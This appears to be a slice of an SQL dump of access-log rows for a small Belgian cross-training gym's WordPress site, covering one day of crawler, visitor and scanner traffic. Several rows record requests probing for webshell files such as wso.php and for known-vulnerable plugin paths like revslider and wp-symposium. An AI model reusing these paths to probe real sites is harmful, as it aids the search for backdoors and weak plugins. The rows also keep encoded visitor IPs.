(70316, 1492801393.923157, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/shwso.php', '', ''),
(70317, 1492801406.166499, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/sys.php', '', ''),
(70318, 1492801659.557960, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/grand.php', '', ''),
(70319, 1492801945.592072, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70320, 1492801946.339081, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70321, 1492801946.880062, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70322, 1492801947.421519, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70323, 1492801947.999319, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70324, 1492801949.169671, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70325, 1492801950.150220, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70326, 1492801950.703367, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70327, 1492801951.332149, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70328, 1492801952.385349, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70329, 1492801952.913340, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70330, 1492802743.649888, 693628318, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32'),
(70331, 1492802755.818275, 693628318, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32'),
(70332, 1492802758.035019, 693628318, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32'),
(70333, 1492802758.918042, 693628318, 0, 0, 0, 0, 0, 'http://crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32'),
(70334, 1492803337.281581, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/security.php', '', ''),
(70335, 1492804933.818405, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp_module/wp-conf.php', '', ''),
(70336, 1492805364.505665, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/log.php', '', ''),
(70337, 1492805911.519403, 3024883463, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70338, 1492806603.249020, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyeleven/system.php', '', ''),
(70339, 1492806626.820772, 676177817, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70340, 1492807657.894529, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-plugins.php', '', ''),
(70341, 1492808137.802464, 1806877237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) AppEngine-Google; (+http://code.google.com/appengine; appid: s~virustotalcloud)'),
(70342, 1492808137.837233, 3423455625, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.bing.com', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)'),
(70343, 1492808170.815516, 2960259765, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/func.php', '', ''),
(70344, 1492808419.781733, 2990433199, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)'),
(70345, 1492809078.333691, 1588718379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1'),
(70346, 1492809821.227797, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp_module/', '', ''),
(70347, 1492809843.209311, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/Iicense.php?f29', '', ''),
(70348, 1492809864.953760, 635281730, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'),
(70349, 1492810687.262175, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/content-wrapper.php', '', ''),
(70350, 1492811347.433163, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/modx.php', '', ''),
(70351, 1492811658.661633, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/view.php', '', ''),
(70352, 1492812302.470790, 2637637570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70353, 1492812450.972409, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/log.php', '', ''),
(70354, 1492813854.662571, 3652617279, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70355, 1492814327.577910, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/system.php', '', ''),
(70356, 1492815090.873306, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyten/404.php', '', ''),
(70357, 1492815868.187128, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyfifteen/404.php', '', ''),
(70358, 1492816318.714050, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/acismittop/was-wp.php', '', ''),
(70359, 1492816661.886051, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/security-d.php', '', ''),
(70360, 1492816954.499591, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/doc.php', '', ''),
(70361, 1492817702.651237, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/error.php', '', ''),
(70362, 1492818081.290603, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70363, 1492818081.754584, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70364, 1492818319.821303, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/plugin.php', '', ''),
(70365, 1492820023.762825, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/page.php', '', ''),
(70366, 1492820255.828524, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/error_log.php', '', ''),
(70367, 1492820552.458204, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wso.php', '', ''),
(70368, 1492820711.849796, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/apache-conf.php', '', ''),
(70369, 1492820768.200940, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/error_log.php', '', ''),
(70370, 1492822035.134455, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/thumbs.php', '', ''),
(70371, 1492823145.853928, 2960257375, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/inc.php', '', ''),
(70372, 1492823663.780937, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70373, 1492823666.011661, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70374, 1492830879.020230, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70375, 1492831408.208048, 1123633430, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70376, 1492831409.273553, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70377, 1492835067.412488, 1123633542, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70378, 1492837361.388131, 3475901863, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70379, 1492839048.122526, 1123633542, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70380, 1492843124.284948, 1837522582, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70381, 1492843126.107121, 1837522582, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70382, 1492843138.765480, 1837522582, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70383, 1492843146.640865, 1837522582, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70384, 1492844188.299516, 2637637570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70385, 1492844188.793960, 2637637570, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70386, 1492845990.108959, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70387, 1492847905.827893, 2655380742, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70388, 1492847915.118179, 2655380742, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70389, 1492847918.544286, 2655380742, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70390, 1492847920.168411, 2655380742, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70391, 1492847921.703675, 2655380742, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70392, 1492847923.334081, 2655380742, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70393, 1492847924.882445, 2655380742, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70394, 1492847940.277370, 2655380742, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70395, 1492847942.639620, 2655380742, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),
(70396, 1492847952.030020, 2655380742, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(70397, 1492849610.364583, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70398, 1492849610.857007, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70399, 1492853320.740305, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70400, 1492859077.994170, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70401, 1492859078.907730, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70402, 1492859088.848035, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70403, 1492859120.270626, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70404, 1492859134.081115, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70405, 1492859143.454515, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70406, 1492859150.494026, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70407, 1492859158.601340, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70408, 1492859165.329574, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70409, 1492859169.641544, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70410, 1492859177.433250, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70411, 1492859184.838005, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70412, 1492859195.140867, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70413, 1492860041.506586, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70414, 1492860651.144047, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70415, 1492870128.717021, 1463941259, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70416, 1492870171.540674, 1463941259, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70417, 1492870217.800545, 1463941259, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70418, 1492870304.785499, 1463941259, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70419, 1492870320.438047, 1463941259, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70420, 1492870391.262609, 3024883472, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70421, 1492870412.860962, 1463941259, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70422, 1492870428.517295, 1463941259, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70423, 1492874403.434281, 758618229, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70424, 1492874408.351996, 758618229, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70425, 1492874410.145126, 758618229, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70426, 1492874413.094964, 758618229, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70427, 1492874418.180582, 758618229, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70428, 1492874428.742264, 758618229, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/?page_id=266', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70429, 1492874433.861660, 758618229, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70430, 1492874438.847068, 758618229, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70431, 1492874443.743584, 758618229, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )'),
(70432, 1492877834.022178, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70433, 1492877834.665767, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70434, 1492877835.229333, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70435, 1492877835.706179, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70436, 1492877836.167109, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70437, 1492877836.651521, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70438, 1492877837.152807, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70439, 1492877837.661568, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70440, 1492877838.175725, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70441, 1492877838.616443, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70442, 1492877839.102165, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70443, 1492880488.837634, 1159648650, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70444, 1492880500.411608, 1159648650, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70445, 1492880506.920865, 1159648650, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(70446, 1492882925.327088, 3024883472, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70447, 1492883213.039889, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70448, 1492883213.600686, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
